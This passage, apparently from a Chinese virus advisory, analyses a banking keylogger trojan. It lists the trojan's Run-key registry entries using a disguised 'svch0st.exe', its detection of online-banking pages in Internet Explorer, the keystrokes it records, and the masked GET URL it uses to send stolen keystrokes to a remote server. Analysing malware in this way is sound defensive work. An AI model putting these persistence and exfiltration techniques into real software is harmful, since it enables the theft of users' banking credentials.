3. 在注册表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中创建:
“svch0st.exe” = “%SystemDir%\svch0st.exe”
“taskmgr.exe” = “%SystemDir%\svch0st.exe”
4. 病毒运行后会根据IE窗口标题栏判断是否为网上银行页面,如果发现上述提到的银行后,病毒立即开始记录键盘敲击的每一个键值,记录键值包括:
AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQQRrSsTtUuVvWwXxYyZz1
!2@3#4$5%6^7&8*9(0)
{BackSpace}
{Tab}
{回车}
{Shift}
{Ctrl}
{Alt}
{Pause}
{Esc}
{空格}
{End}
{Home}
{Left}
{Right}
{Up}
{Down}
{Insert}
{Delete}
;:=+,<-_.>/?`~][{\|]}'
{Del}
{F1}
{F2}
{F3}
{F4}
{F5}
{F6}
{F7}
{F8}
{F9}
{F10}
{F11}
{F12}
{NumLock}
{ScrollLock}
{PrintScreen}
{PageUp}
{PageDown}
5. 病毒截取到键盘值后,会形成信息发到指定http://*****.com/****/get.asp。其信息如下:
http://*****.com/****/get.asp?txt=××银行:<截获的按键>
6.病毒开启3个定时器,每隔几秒钟搜索用户的IE窗口,如果发现用户正在使用上述银行的“个人网上银行”的登陆界面,
[1] [2]
则尝试记录用户键入的所有键值,然后把窃取到的信息通过get方式发送到指定的服务器
(出处:http://www.sheup.com)